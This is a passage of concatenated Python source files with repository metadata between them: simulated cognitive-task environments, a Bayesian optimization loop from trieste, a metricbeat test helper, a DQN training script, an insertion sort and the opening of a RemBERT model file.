self.hidden_states[tau, 0] = 0
# if tau%100==0:
# print("trial:", tau)
def generate_observations(self, tau, t):
#generate one sample from multinomial distribution
o = np.random.multinomial(1, self.Omega[:, self.hidden_states[tau, t]]).argmax()
return o
def update_hidden_states(self, tau, t, response):
current_state = self.hidden_states[tau, t-1]
self.hidden_states[tau, t] = np.random.choice(self.Theta.shape[0],
p = self.Theta[:, current_state, int(response)])
def generate_rewards(self, tau, t):
#generate one sample from multinomial distribution
r = np.random.choice(self.Rho.shape[1], p = self.Rho[tau, :, self.hidden_states[tau, t]])
# if tau < self.trials-1:
# #change Rho slowly
# change = np.random.choice(self.changes, size=self.nh-1)
# self.Rho[tau+1,0,1:] = self.Rho[tau,0,1:] + change
# self.Rho[tau+1,1,1:] = self.Rho[tau,1,1:] - change
# self.Rho[tau+1][self.Rho[tau+1] > 1.] = 1.
# self.Rho[tau+1][self.Rho[tau+1] < 0.] = 0.
return r
class TaskSwitching(object):
def __init__(self, Omega, Theta, Rho, Chi, start_states, contexts,
trials = 1, T = 10, correct_choice=None, congruent=None,
num_in_run=None):
#set probability distribution used for generating observations
self.Omega = Omega.copy()
#set probability distribution used for generating rewards
# self.Rho = np.zeros((trials, Rho.shape[0], Rho.shape[1]))
# self.Rho[0] = Rho.copy()
self.Rho = Rho.copy()
#set probability distribution used for generating state transitions
self.Theta = Theta.copy()
self.nh = Theta.shape[0]
self.Chi = Chi.copy()
# self.changes = np.array([0.01, -0.01])
assert(len(start_states==trials))
#set container that keeps track the evolution of the hidden states
self.hidden_states = np.zeros((trials, T), dtype = int)
self.hidden_states[:,0] = start_states
self.contexts = contexts.copy().astype(int)
self.trials = trials
if correct_choice is not None:
self.correct_choice = correct_choice
if congruent is not None:
self.congruent = congruent
if num_in_run is not None:
self.num_in_run = num_in_run
def set_initial_states(self, tau):
#start in lower corner
#self.hidden_states[tau, 0] = 0
pass
# if tau%100==0:
# print("trial:", tau)
def generate_observations(self, tau, t):
#generate one sample from multinomial distribution
o = np.random.multinomial(1, self.Omega[:, self.hidden_states[tau, t]]).argmax()
return o
def update_hidden_states(self, tau, t, response):
current_state = self.hidden_states[tau, t-1]
current_context = self.contexts[tau]
self.hidden_states[tau, t] = np.random.choice(self.Theta.shape[0],
p = self.Theta[:, current_state, int(response), current_context])
def generate_rewards(self, tau, t):
#generate one sample from multinomial distribution
r = np.random.choice(self.Rho.shape[1], p = self.Rho[tau, :, self.hidden_states[tau, t]])
# if tau < self.trials-1:
# #change Rho slowly
# change = np.random.choice(self.changes, size=self.nh-1)
# self.Rho[tau+1,0,1:] = self.Rho[tau,0,1:] + change
# self.Rho[tau+1,1,1:] = self.Rho[tau,1,1:] - change
# self.Rho[tau+1][self.Rho[tau+1] > 1.] = 1.
# self.Rho[tau+1][self.Rho[tau+1] < 0.] = 0.
return r
def generate_context_obs(self, tau):
c = np.random.choice(self.Chi.shape[0], p=self.Chi[self.contexts[tau]])
return c
class TaskSwitchingOneConext(object):
def __init__(self, Omega, Theta, Rho, Chi, start_states, contexts,
trials = 1, T = 10, correct_choice=None, congruent=None,
num_in_run=None):
#set probability distribution used for generating observations
self.Omega = Omega.copy()
#set probability distribution used for generating rewards
# self.Rho = np.zeros((trials, Rho.shape[0], Rho.shape[1]))
# self.Rho[0] = Rho.copy()
self.Rho = Rho.copy()
#set probability distribution used for generating state transitions
self.Theta = Theta.copy()
self.nh = Theta.shape[0]
self.Chi = Chi.copy()
# self.changes = np.array([0.01, -0.01])
assert(len(start_states==trials))
#set container that keeps track the evolution of the hidden states
self.hidden_states = np.zeros((trials, T), dtype = int)
self.hidden_states[:,0] = start_states
self.contexts = contexts.copy().astype(int)
self.trials = trials
if correct_choice is not None:
self.correct_choice = correct_choice
if congruent is not None:
self.congruent = congruent
if num_in_run is not None:
self.num_in_run = num_in_run
def set_initial_states(self, tau):
#start in lower corner
#self.hidden_states[tau, 0] = 0
pass
# if tau%100==0:
# print("trial:", tau)
def generate_observations(self, tau, t):
#generate one sample from multinomial distribution
o = np.random.multinomial(1, self.Omega[:, self.hidden_states[tau, t]]).argmax()
return o
def update_hidden_states(self, tau, t, response):
current_state = self.hidden_states[tau, t-1]
self.hidden_states[tau, t] = np.random.choice(self.Theta.shape[0],
p = self.Theta[:, current_state, int(response)][:,0])
def generate_rewards(self, tau, t):
#generate one sample from multinomial distribution
current_context = self.contexts[tau]
r = np.random.choice(self.Rho.shape[0], p = self.Rho[:, self.hidden_states[tau, t], current_context])
# if tau < self.trials-1:
# #change Rho slowly
# change = np.random.choice(self.changes, size=self.nh-1)
# self.Rho[tau+1,0,1:] = self.Rho[tau,0,1:] + change
# self.Rho[tau+1,1,1:] = self.Rho[tau,1,1:] - change
# self.Rho[tau+1][self.Rho[tau+1] > 1.] = 1.
# self.Rho[tau+1][self.Rho[tau+1] < 0.] = 0.
return r
def generate_context_obs(self, tau):
#c = np.random.choice(self.Chi.shape[0], p=self.Chi[self.contexts[tau]])
return 0#c
class Flanker(object):
def __init__(self, Omega, Theta, Rho, Chi, start_states, contexts, flankers,
trials = 1, T = 10, correct_choice=None, congruent=None):
#set probability distribution used for generating observations
self.Omega = Omega.copy()
#set probability distribution used for generating rewards
# self.Rho = np.zeros((trials, Rho.shape[0], Rho.shape[1]))
# self.Rho[0] = Rho.copy()
self.Rho = Rho.copy()
#set probability distribution used for generating state transitions
self.Theta = Theta.copy()
self.nh = Theta.shape[0]
self.Chi = Chi.copy()
# self.changes = np.array([0.01, -0.01])
assert(len(start_states==trials))
#set container that keeps track the evolution of the hidden states
self.hidden_states = np.zeros((trials, T), dtype = int)
self.hidden_states[:,0] = start_states
self.contexts = contexts.copy().astype(int)
self.flankers = flankers.copy()
self.trials = trials
if correct_choice is not None:
self.correct_choice = correct_choice
if congruent is not None:
self.congruent = congruent
def set_initial_states(self, tau):
#start in lower corner
#self.hidden_states[tau, 0] = 0
pass
# if tau%100==0:
# print("trial:", tau)
def generate_observations(self, tau, t):
#generate one sample from multinomial distribution
o = np.random.multinomial(1, self.Omega[:, self.hidden_states[tau, t]]).argmax()
return o
def update_hidden_states(self, tau, t, response):
current_state = self.hidden_states[tau, t-1]
current_context = self.contexts[tau]
self.hidden_states[tau, t] = np.random.choice(self.Theta.shape[0],
p = self.Theta[:, current_state, int(response), current_context])
def generate_rewards(self, tau, t):
#generate one sample from multinomial distribution
r = np.random.choice(self.Rho.shape[1], p = self.Rho[tau, :, self.hidden_states[tau, t]])
# if tau < self.trials-1:
# #change Rho slowly
# change = np.random.choice(self.changes, size=self.nh-1)
# self.Rho[tau+1,0,1:] = self.Rho[tau,0,1:] + change
# self.Rho[tau+1,1,1:] = self.Rho[tau,1,1:] - change
# self.Rho[tau+1][self.Rho[tau+1] > 1.] = 1.
# self.Rho[tau+1][self.Rho[tau+1] < 0.] = 0.
return r
def generate_context_obs(self, tau):
c = np.random.choice(self.Chi.shape[0], p=self.Chi[self.contexts[tau]])
return c
class TMaze(object):
def __init__(self, Omega, Theta, Rho,
trials = 1, T = 10):
#set probability distribution used for generating observations
self.Omega = Omega.copy()
#set probability distribution used for generating rewards
# self.Rho = np.zeros((trials, Rho.shape[0], Rho.shape[1]))
# self.Rho[0] = Rho.copy()
self.Rho = Rho.copy()
#set probability distribution used for generating state transitions
self.Theta = Theta.copy()
self.nh = Theta.shape[0]
# self.changes = np.array([0.01, -0.01])
#set container that keeps track the evolution of the hidden states
self.hidden_states = np.zeros((trials, T), dtype = int)
self.trials = trials
def set_initial_states(self, tau):
#start in lower corner
self.hidden_states[tau, 0] = 0
# if tau%100==0:
# print("trial:", tau)
def generate_observations(self, tau, t):
#generate one sample from multinomial distribution
o = np.random.multinomial(1, self.Omega[:, self.hidden_states[tau, t]]).argmax()
return o
def update_hidden_states(self, tau, t, response):
current_state = self.hidden_states[tau, t-1]
self.hidden_states[tau, t] = np.random.choice(self.Theta.shape[0],
p = self.Theta[:, current_state, int(response)])
def generate_rewards(self, tau, t):
#generate one sample from multinomial distribution
r = np.random.choice(self.Rho.shape[1], p = self.Rho[tau, :, self.hidden_states[tau, t]])
return r
class TwoStep(object):
def __init__(self, Omega, Theta, Rho,
trials = 1, T = 10):
#set probability distribution used for generating observations
self.Omega = Omega.copy()
#set probability distribution used for generating rewards
self.Rho = np.zeros((trials, Rho.shape[0], Rho.shape[1]))
self.Rho[0] = Rho.copy()
#set probability distribution used for generating state transitions
self.Theta = Theta.copy()
self.nh = Theta.shape[0]
self.changes = np.array([0.01, -0.01])
#set container that keeps track the evolution of the hidden states
self.hidden_states = np.zeros((trials, T), dtype = int)
self.trials = trials
self.T = T
def set_initial_states(self, tau):
#start in lower corner
self.hidden_states[tau, 0] = 0
if tau%100==0:
print("trial:", tau)
def generate_observations(self, tau, t):
#generate one sample from multinomial distribution
o = np.random.multinomial(1, self.Omega[:, self.hidden_states[tau, t]]).argmax()
return o
def update_hidden_states(self, tau, t, response):
current_state = self.hidden_states[tau, t-1]
self.hidden_states[tau, t] = np.random.choice(self.Theta.shape[0],
p = self.Theta[:, current_state, int(response)])
def generate_rewards(self, tau, t):
#generate one sample from multinomial distribution
r = np.random.choice(self.Rho.shape[1], p = self.Rho[tau, :, self.hidden_states[tau, t]])
if (tau < self.trials-1) and t == self.T-1:
#change Rho slowly
self.Rho[tau+1] = self.Rho[tau]
change = np.random.choice(self.changes, size=self.nh - 3)
self.Rho[tau+1,0,3:] = self.Rho[tau+1,0,3:] + change
self.Rho[tau+1,1,3:] = self.Rho[tau+1,1,3:] - change
self.Rho[tau+1,:,3:][self.Rho[tau+1,:,3:] > 1.] = 1.
self.Rho[tau+1,:,3:][self.Rho[tau+1,:,3:] < 0.] = 0.
return r
| 32.978474
| 109
| 0.600641
|
99784635adee2c9e95c8d80a7b42ced0195df238
| 418
|
py
|
Python
|
pinkfish/tests/test_config.py
|
simongarisch/pinkfish
|
1265b6642e2990dd84fb65353cf44965d85c7083
|
[
"MIT"
] | 1
|
2020-03-31T04:02:19.000Z
|
2020-03-31T04:02:19.000Z
|
pinkfish/tests/test_config.py
|
simongarisch/pinkfish
|
1265b6642e2990dd84fb65353cf44965d85c7083
|
[
"MIT"
] | null | null | null |
pinkfish/tests/test_config.py
|
simongarisch/pinkfish
|
1265b6642e2990dd84fb65353cf44965d85c7083
|
[
"MIT"
] | null | null | null |
import os
import pinkfish as pf
def get_test_config_path(*args):
''' Returns the path to a .pinkfish config file
in the tests directory.
'''
dire_path = os.path.dirname(os.path.abspath(__file__))
file_path = os.path.join(dire_path, ".pinkfish")
return file_path
def read_config_for_tests():
conf = {}
conf["base_dir"] = os.path.dirname(os.path.abspath(__file__))
return conf
| 24.588235
| 65
| 0.681818
|
d198809dec1ca16ffebb8a83f0335cb49d10d82b
| 548
|
py
|
Python
|
DQN/CNN_DQN/main.py
|
imhgchoi/pytorch_implementations
|
e6add9991b23604a8ef1b4a34391f3014db6bbbd
|
[
"MIT"
] | 3
|
2021-01-16T13:33:15.000Z
|
2021-12-04T12:06:05.000Z
|
DQN/CNN_DQN/main.py
|
imhgchoi/pytorch_implementations
|
e6add9991b23604a8ef1b4a34391f3014db6bbbd
|
[
"MIT"
] | null | null | null |
DQN/CNN_DQN/main.py
|
imhgchoi/pytorch_implementations
|
e6add9991b23604a8ef1b4a34391f3014db6bbbd
|
[
"MIT"
] | 1
|
2021-04-25T13:37:03.000Z
|
2021-04-25T13:37:03.000Z
|
from CNN_DQN.environment import Environment
from CNN_DQN.agent import Agent
from CNN_DQN.learner import Learner
if __name__ == '__main__' :
LEARNING_RATE = 0.005
MAX_MEMORY = 10000
BATCH_SIZE = 300
EPISODE = 50000
TARGET_UPDATE = 20
EPS_START = 0.9
EPS_END = 0.05
EPS_DECAY = 200
GAMMA = 0.999
env = Environment()
agent = Agent(LEARNING_RATE, MAX_MEMORY, BATCH_SIZE, EPS_START, EPS_END, EPS_DECAY, GAMMA)
learner = Learner(env, agent, EPISODE, TARGET_UPDATE)
learner.learn()
| 27.4
| 95
| 0.675182
|
0fe092e92342aa85749b6caefcedad63a554967b
| 11,729
|
py
|
Python
|
trieste/bayesian_optimizer.py
|
icouckuy/trieste
|
92e6e51bb218e2215f93cf3994b4ce9d8a4743dc
|
[
"Apache-2.0"
] | null | null | null |
trieste/bayesian_optimizer.py
|
icouckuy/trieste
|
92e6e51bb218e2215f93cf3994b4ce9d8a4743dc
|
[
"Apache-2.0"
] | null | null | null |
trieste/bayesian_optimizer.py
|
icouckuy/trieste
|
92e6e51bb218e2215f93cf3994b4ce9d8a4743dc
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The Trieste Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module contains the :class:`BayesianOptimizer` class, used to perform Bayesian optimization.
"""
from __future__ import annotations
import copy
import traceback
from dataclasses import dataclass
from typing import Generic, List, Mapping, Optional, Tuple, TypeVar, cast, overload
import gpflow
import tensorflow as tf
from absl import logging
from .acquisition.rule import OBJECTIVE, AcquisitionRule, EfficientGlobalOptimization
from .data import Dataset
from .models import ModelSpec, TrainableProbabilisticModel, create_model
from .observer import Observer
from .space import SearchSpace
from .utils import Err, Ok, Result
S = TypeVar("S")
""" Unbound type variable. """
SP = TypeVar("SP", bound=SearchSpace)
""" Type variable bound to :class:`SearchSpace`. """
@dataclass(frozen=True)
class Record(Generic[S]):
""" Container to record the state of each step of the optimization process. """
datasets: Mapping[str, Dataset]
""" The known data from the observer. """
models: Mapping[str, TrainableProbabilisticModel]
""" The models over the :attr:`datasets`. """
acquisition_state: Optional[S]
""" The acquisition state. """
# this should be a generic NamedTuple, but mypy doesn't support them
# https://github.com/python/mypy/issues/685
@dataclass(frozen=True)
class OptimizationResult(Generic[S]):
""" The final result, and the historical data of the optimization process. """
final_result: Result[Record[S]]
"""
The final result of the optimization process. This contains either a :class:`Record` or an
exception.
"""
history: List[Record[S]]
r"""
The history of the :class:`Record`\ s from each step of the optimization process. These
:class:`Record`\ s are created at the *start* of each loop, and as such will never include the
:attr:`final_result`.
"""
def astuple(self) -> Tuple[Result[Record[S]], List[Record[S]]]:
"""
**Note:** In contrast to the standard library function :func:`dataclasses.astuple`, this
method does *not* deepcopy instance attributes.
:return: The :attr:`final_result` and :attr:`history` as a 2-tuple.
"""
return self.final_result, self.history
def try_get_final_datasets(self) -> Mapping[str, Dataset]:
"""
Convenience method to attempt to get the final data.
:return: The final data, if the optimization completed successfully.
:raise Exception: If an exception occurred during optimization.
"""
return self.final_result.unwrap().datasets
def try_get_final_models(self) -> Mapping[str, TrainableProbabilisticModel]:
"""
Convenience method to attempt to get the final models.
:return: The final models, if the optimization completed successfully.
:raise Exception: If an exception occurred during optimization.
"""
return self.final_result.unwrap().models
class BayesianOptimizer(Generic[SP]):
"""
This class performs Bayesian optimization, the data-efficient optimization of an expensive
black-box *objective function* over some *search space*. Since we may not have access to the
objective function itself, we speak instead of an *observer* that observes it.
"""
def __init__(self, observer: Observer, search_space: SP):
"""
:param observer: The observer of the objective function.
:param search_space: The space over which to search. Must be a
:class:`~trieste.space.SearchSpace`.
"""
self._observer = observer
self._search_space = search_space
def __repr__(self) -> str:
""""""
return f"BayesianOptimizer({self._observer!r}, {self._search_space!r})"
@overload
def optimize(
self,
num_steps: int,
datasets: Mapping[str, Dataset],
model_specs: Mapping[str, ModelSpec],
*,
track_state: bool = True,
) -> OptimizationResult[None]:
...
@overload
def optimize(
self,
num_steps: int,
datasets: Mapping[str, Dataset],
model_specs: Mapping[str, ModelSpec],
acquisition_rule: AcquisitionRule[S, SP],
acquisition_state: Optional[S] = None,
*,
track_state: bool = True,
) -> OptimizationResult[S]:
...
def optimize(
self,
num_steps: int,
datasets: Mapping[str, Dataset],
model_specs: Mapping[str, ModelSpec],
acquisition_rule: Optional[AcquisitionRule[S, SP]] = None,
acquisition_state: Optional[S] = None,
*,
track_state: bool = True,
) -> OptimizationResult[S]:
"""
Attempt to find the minimizer of the ``observer`` in the ``search_space`` (both specified at
:meth:`__init__`). This is the central implementation of the Bayesian optimization loop.
For each step in ``num_steps``, this method:
- Finds the next points with which to query the ``observer`` using the
``acquisition_rule``'s :meth:`acquire` method, passing it the ``search_space``,
``datasets``, models built from the ``model_specs``, and current acquisition state.
- Queries the ``observer`` *once* at those points.
- Updates the datasets and models with the data from the ``observer``.
If any errors are raised during the optimization loop, this method will catch and return
them instead, along with the history of the optimization process, and print a message (using
`absl` at level `logging.ERROR`).
**Note:** While the :class:`~trieste.models.TrainableProbabilisticModel` interface implies
mutable models, it is *not* guaranteed that the model passed to :meth:`optimize` will be
updated during the optimization process. For example, if ``track_state`` is `True`, a copied
model will be used on each optimization step. Use the models in the return value for
reliable access to the updated models.
**Type hints:**
- The ``acquisition_rule`` must use the same type of
:class:`~trieste.space.SearchSpace` as specified in :meth:`__init__`.
- The ``acquisition_state`` must be of the type expected by the ``acquisition_rule``.
Any acquisition state in the optimization result will also be of this type.
:param num_steps: The number of optimization steps to run.
:param datasets: The known observer query points and observations for each tag.
:param model_specs: The model to use for each :class:`~trieste.data.Dataset` in
``datasets``.
:param acquisition_rule: The acquisition rule, which defines how to search for a new point
on each optimization step. Defaults to
:class:`~trieste.acquisition.rule.EfficientGlobalOptimization` with default
arguments. Note that if the default is used, this implies the tags must be
`OBJECTIVE`, the search space can be any :class:`~trieste.space.SearchSpace`, and the
acquisition state returned in the :class:`OptimizationResult` will be `None`.
:param acquisition_state: The acquisition state to use on the first optimization step.
This argument allows the caller to restore the optimization process from an existing
:class:`Record`.
:param track_state: If `True`, this method saves the optimization state at the start of each
step. Models and acquisition state are copied using `copy.deepcopy`.
:return: An :class:`OptimizationResult`. The :attr:`final_result` element contains either
the final optimization data, models and acquisition state, or, if an exception was
raised while executing the optimization loop, it contains the exception raised. In
either case, the :attr:`history` element is the history of the data, models and
acquisition state at the *start* of each optimization step (up to and including any step
that fails to complete). The history will never include the final optimization result.
:raise ValueError: If any of the following are true:
- ``num_steps`` is negative.
- the keys in ``datasets`` and ``model_specs`` do not match
- ``datasets`` or ``model_specs`` are empty
- the default `acquisition_rule` is used and the tags are not `OBJECTIVE`.
"""
if num_steps < 0:
raise ValueError(f"num_steps must be at least 0, got {num_steps}")
if datasets.keys() != model_specs.keys():
raise ValueError(
f"datasets and model_specs should contain the same keys. Got {datasets.keys()} and"
f" {model_specs.keys()} respectively."
)
if not datasets:
raise ValueError("dicts of datasets and model_specs must be populated.")
if acquisition_rule is None:
if datasets.keys() != {OBJECTIVE}:
raise ValueError(
f"Default acquisition rule EfficientGlobalOptimization requires tag"
f" {OBJECTIVE!r}, got keys {datasets.keys()}"
)
acquisition_rule = cast(AcquisitionRule[S, SP], EfficientGlobalOptimization())
models = {tag: create_model(spec) for tag, spec in model_specs.items()}
history: List[Record[S]] = []
for step in range(num_steps):
if track_state:
history.append(Record(datasets, models, acquisition_state))
try:
if track_state:
models = {tag: gpflow.utilities.deepcopy(m) for tag, m in models.items()}
acquisition_state = copy.deepcopy(acquisition_state)
query_points, acquisition_state = acquisition_rule.acquire(
self._search_space, datasets, models, acquisition_state
)
observer_output = self._observer(query_points)
datasets = {tag: datasets[tag] + observer_output[tag] for tag in observer_output}
for tag, model in models.items():
dataset = datasets[tag]
model.update(dataset)
model.optimize(dataset)
except Exception as error:
tf.print(
f"\nOptimization failed at step {step}, encountered error with traceback:"
f"\n{traceback.format_exc()}"
f"\nTerminating optimization and returning the optimization history. You may "
f"be able to use the history to restart the process from a previous successful "
f"optimization step.\n",
output_stream=logging.ERROR,
)
return OptimizationResult(Err(error), history)
tf.print("Optimization completed without errors", output_stream=logging.INFO)
record = Record(datasets, models, acquisition_state)
return OptimizationResult(Ok(record), history)
| 42.96337
| 100
| 0.652571
|
61f8ab12d5ea6d3f99988ab7a541d702cc3e7582
| 528
|
py
|
Python
|
collection/processor/sort_collection/sort_collection.py
|
ebursztein/sitefab-plugins
|
75e81cb0196a462772f7469c479bc3c6e0be1255
|
[
"Apache-2.0"
] | null | null | null |
collection/processor/sort_collection/sort_collection.py
|
ebursztein/sitefab-plugins
|
75e81cb0196a462772f7469c479bc3c6e0be1255
|
[
"Apache-2.0"
] | 1
|
2020-01-18T21:09:05.000Z
|
2020-01-18T21:09:05.000Z
|
collection/processor/sort_collection/sort_collection.py
|
ebursztein/sitefab-plugins
|
75e81cb0196a462772f7469c479bc3c6e0be1255
|
[
"Apache-2.0"
] | null | null | null |
from sitefab.plugins import CollectionProcessor
from sitefab.SiteFab import SiteFab
class SortCollection(CollectionProcessor):
"""
Sort Collection
"""
def process(self, collection, site, config):
if config.sort_by == "udpate_date":
k = lambda x: x.meta.update_date_ts
else:
k = lambda x: x.meta.creation_date_ts
# note: recall sort do sorting in place!
collection.posts.sort(key=k, reverse=True)
return (SiteFab.OK, collection.meta.name, "")
| 25.142857
| 53
| 0.649621
|
8308a9c0e765996a679253c0505db2ba5988d2f7
| 2,984
|
py
|
Python
|
metricbeat/tests/system/metricbeat.py
|
wklken/beats
|
60e8999da198f1c8c4242c8afc77e39a82b6e47f
|
[
"Apache-2.0"
] | 16
|
2018-08-22T03:29:31.000Z
|
2021-09-05T14:01:10.000Z
|
vendor/github.com/elastic/beats/metricbeat/tests/system/metricbeat.py
|
railroadmanuk/rubrikbeat
|
af012076d68f64e12092d885257aa5a706453695
|
[
"MIT"
] | 3
|
2020-05-29T13:53:51.000Z
|
2021-06-01T22:19:56.000Z
|
metricbeat/tests/system/metricbeat.py
|
sure0000/beats
|
1690690b3fcbe4a46aedc1121f9aa128497ed22d
|
[
"ECL-2.0",
"Apache-2.0"
] | 6
|
2018-10-31T06:55:01.000Z
|
2021-02-06T18:50:04.000Z
|
import re
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '../../../libbeat/tests/system'))
from beat.beat import TestCase
COMMON_FIELDS = ["@timestamp", "beat", "metricset.name", "metricset.host",
"metricset.module", "metricset.rtt", "host.name"]
INTEGRATION_TESTS = os.environ.get('INTEGRATION_TESTS', False)
import logging
logging.getLogger("urllib3").setLevel(logging.WARNING)
class BaseTest(TestCase):
@classmethod
def setUpClass(self):
self.beat_name = "metricbeat"
self.beat_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../"))
super(BaseTest, self).setUpClass()
def de_dot(self, existing_fields):
fields = {}
# Dedot first level of dots
for key in existing_fields:
parts = key.split('.', 1)
if len(parts) > 1:
if parts[0] not in fields:
fields[parts[0]] = {}
fields[parts[0]][parts[1]] = parts[1]
else:
fields[parts[0]] = parts[0]
# Dedot further levels recursively
for key in fields:
if type(fields[key]) is dict:
fields[key] = self.de_dot(fields[key])
return fields
def assert_no_logged_warnings(self, replace=None):
"""
Assert that the log file contains no ERROR or WARN lines.
"""
log = self.get_log()
pattern = self.build_log_regex("\[cfgwarn\]")
log = pattern.sub("", log)
# Jenkins runs as a Windows service and when Jenkins executes these
# tests the Beat is confused since it thinks it is running as a service.
pattern = self.build_log_regex("The service process could not connect to the service controller.")
log = pattern.sub("", log)
if replace:
for r in replace:
pattern = self.build_log_regex(r)
log = pattern.sub("", log)
self.assertNotRegexpMatches(log, "\tERROR\t|\tWARN\t")
def build_log_regex(self, message):
return re.compile(r"^.*\t(?:ERROR|WARN)\t.*" + message + r".*$", re.MULTILINE)
def check_metricset(self, module, metricset, hosts, fields=[], extras=[]):
"""
Method to test a metricset for its fields
"""
self.render_config_template(modules=[{
"name": module,
"metricsets": [metricset],
"hosts": hosts,
"period": "1s",
"extras": extras,
}])
proc = self.start_beat()
self.wait_until(lambda: self.output_lines() > 0)
proc.check_kill_and_wait()
self.assert_no_logged_warnings()
output = self.read_output_json()
self.assertTrue(len(output) >= 1)
evt = output[0]
print(evt)
fields = COMMON_FIELDS + fields
self.assertItemsEqual(self.de_dot(fields), evt.keys())
self.assert_fields_are_documented(evt)
| 31.083333
| 106
| 0.585791
|
c83b69fd158065e639c1686070d711adaa3e431c
| 802
|
py
|
Python
|
collection/cp/algorithms-master/python/sort/insertion_sort.py
|
daemonslayer/Notebook
|
a9880be9bd86955afd6b8f7352822bc18673eda3
|
[
"Apache-2.0"
] | 1
|
2019-03-24T13:12:01.000Z
|
2019-03-24T13:12:01.000Z
|
collection/cp/algorithms-master/python/sort/insertion_sort.py
|
daemonslayer/Notebook
|
a9880be9bd86955afd6b8f7352822bc18673eda3
|
[
"Apache-2.0"
] | null | null | null |
collection/cp/algorithms-master/python/sort/insertion_sort.py
|
daemonslayer/Notebook
|
a9880be9bd86955afd6b8f7352822bc18673eda3
|
[
"Apache-2.0"
] | null | null | null |
"""
Recursive insertion sort implementation in Python 3
https://en.wikipedia.org/wiki/Insertion_sort
"""
def insertion_sort(lis):
"""
Implementation of recursive insertion sort.
:param lis: list to be sorted
"""
for i in range(len(lis)):
j = i
while j > 0 and lis[j-1] > lis[j]:
lis[j], lis[j-1] = lis[j-1], lis[j]
j -= 1
return lis
def main():
lis1 = [4, 1, 2, 3, 9]
lis2 = [1]
lis3 = [2, 2, 1, -1, 0, 4, 5, 2]
lis4 = []
lis1 = insertion_sort(lis1)
assert lis1 == [1, 2, 3, 4, 9]
lis2 = insertion_sort(lis2)
assert lis2 == [1]
lis3 = insertion_sort(lis3)
assert lis3 == [-1, 0, 1, 2, 2, 2, 4, 5]
lis4 = insertion_sort(lis4)
assert lis4 == []
if __name__ == '__main__':
main()
| 20.05
| 51
| 0.53616
|
d1885b57ddd77b2321796e9b002f318845988c63
| 161
|
py
|
Python
|
tests/web_platform/css_flexbox_1/test_flexbox_item_top_float.py
|
fletchgraham/colosseum
|
77be4896ee52b8f5956a3d77b5f2ccd2c8608e8f
|
[
"BSD-3-Clause"
] | null | null | null |
tests/web_platform/css_flexbox_1/test_flexbox_item_top_float.py
|
fletchgraham/colosseum
|
77be4896ee52b8f5956a3d77b5f2ccd2c8608e8f
|
[
"BSD-3-Clause"
] | null | null | null |
tests/web_platform/css_flexbox_1/test_flexbox_item_top_float.py
|
fletchgraham/colosseum
|
77be4896ee52b8f5956a3d77b5f2ccd2c8608e8f
|
[
"BSD-3-Clause"
] | 1
|
2020-01-16T01:56:41.000Z
|
2020-01-16T01:56:41.000Z
|
from tests.utils import W3CTestCase
class TestFlexbox_ItemTopFloat(W3CTestCase):
vars().update(W3CTestCase.find_tests(__file__, 'flexbox_item-top-float'))
| 26.833333
| 77
| 0.807453
|
46524ce9cbb8b6ee99d921274a755bd48f7c5fba
| 63,922
|
py
|
Python
|
src/transformers/models/rembert/modeling_rembert.py
|
holazzer/transformers
|
53191d75ecca21c028077b3227f9ac47379e4690
|
[
"Apache-2.0"
] | 28
|
2021-09-15T01:25:00.000Z
|
2022-03-01T20:21:28.000Z
|
src/transformers/models/rembert/modeling_rembert.py
|
Hecim1984/transformers
|
8e908c8c74f556a82534f4cf1e7a1b4f7b55d24c
|
[
"Apache-2.0"
] | 1
|
2021-08-09T01:51:17.000Z
|
2021-08-09T01:51:17.000Z
|
src/transformers/models/rembert/modeling_rembert.py
|
Hecim1984/transformers
|
8e908c8c74f556a82534f4cf1e7a1b4f7b55d24c
|
[
"Apache-2.0"
] | 1
|
2021-12-21T12:23:30.000Z
|
2021-12-21T12:23:30.000Z
|
# coding=utf-8
# Copyright 2021 The HuggingFace Team The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch RemBERT model. """
import math
import os
import torch
import torch.utils.checkpoint
from torch import nn
from torch.nn import CrossEntropyLoss, MSELoss
from ...activations import ACT2FN
from ...file_utils import (
add_code_sample_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
replace_return_docstrings,
)
from ...modeling_outputs import (
BaseModelOutputWithPastAndCrossAttentions,
BaseModelOutputWithPoolingAndCrossAttentions,
CausalLMOutputWithCrossAttentions,
MaskedLMOutput,
MultipleChoiceModelOutput,
QuestionAnsweringModelOutput,
SequenceClassifierOutput,
TokenClassifierOutput,
)
from ...modeling_utils import (
PreTrainedModel,
apply_chunking_to_forward,
find_pruneable_heads_and_indices,
prune_linear_layer,
)
from ...utils import logging
from .configuration_rembert import RemBertConfig
logger = logging.get_logger(__name__)
_CONFIG_FOR_DOC = "RemBertConfig"
_TOKENIZER_FOR_DOC = "RemBertTokenizer"
_CHECKPOINT_FOR_DOC = "google/rembert"
REMBERT_PRETRAINED_MODEL_ARCHIVE_LIST = [
"google/rembert",
# See all RemBERT models at https://huggingface.co/models?filter=rembert
]
def load_tf_weights_in_rembert(model, config, tf_checkpoint_path):
"""Load tf checkpoints in a pytorch model."""
try:
import re
import numpy as np
import tensorflow as tf
except ImportError:
logger.error(
"Loading a TensorFlow model in PyTorch, requires TensorFlow to be installed. Please see "
"https://www.tensorflow.org/install/ for installation instructions."
)
raise
tf_path = os.path.abspath(tf_checkpoint_path)
logger.info(f"Converting TensorFlow checkpoint from {tf_path}")
# Load weights from TF model
init_vars = tf.train.list_variables(tf_path)
names = []
arrays = []
for name, shape in init_vars:
# Checkpoint is 12Gb, save memory by not loading useless variables
# Output embedding and cls are reset at classification time
if any(deny in name for deny in ("adam_v", "adam_m", "output_embedding", "cls")):
# logger.info("Skipping loading of %s", name)
